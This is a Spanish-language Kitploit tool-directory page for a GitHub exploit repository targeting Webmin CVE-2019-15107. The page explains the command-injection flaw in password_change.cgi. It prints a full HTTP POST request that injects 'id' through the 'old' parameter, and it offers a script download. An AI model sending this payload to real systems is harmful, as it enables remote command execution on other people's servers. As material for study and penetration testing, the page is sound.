Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

Vulnerabilidad de Ejecución Remota de Código en Webmin

Ver Repositorio
352hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-15107: Módulos de explotación disponibles para la vulnerabilidad de ejecución remota de código en Webmin

  1. Descripción de la vulnerabilidad Webmin es una potente herramienta de administración de sistemas basada en web, ampliamente utilizada en sistemas Unix. Debido a que en el proceso de manejo de solicitudes de Password_Change.cgi en Webmin, el parámetro old tiene una vulnerabilidad de inyección de comandos que puede ser explotada maliciosamente por atacantes. Cuando los usuarios habilitan la función de restablecimiento de contraseña de Webmin, los atacantes pueden usar esta vulnerabilidad para ejecutar comandos arbitrarios en el sistema vulnerable, obteniendo así el shell del sistema.

Versiones afectadas: Webmin 1.920 y versiones anteriores

  1. Explotación de la vulnerabilidad Método 1: Detección manual Acceda a la página, ignore el certificado y podrá ver la página de inicio de sesión de Webmin step 1

Envíe el siguiente paquete de datos, para ejecutar el comando id:

POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 step 2

Método 2: Uso de script step 3

Descargar herramienta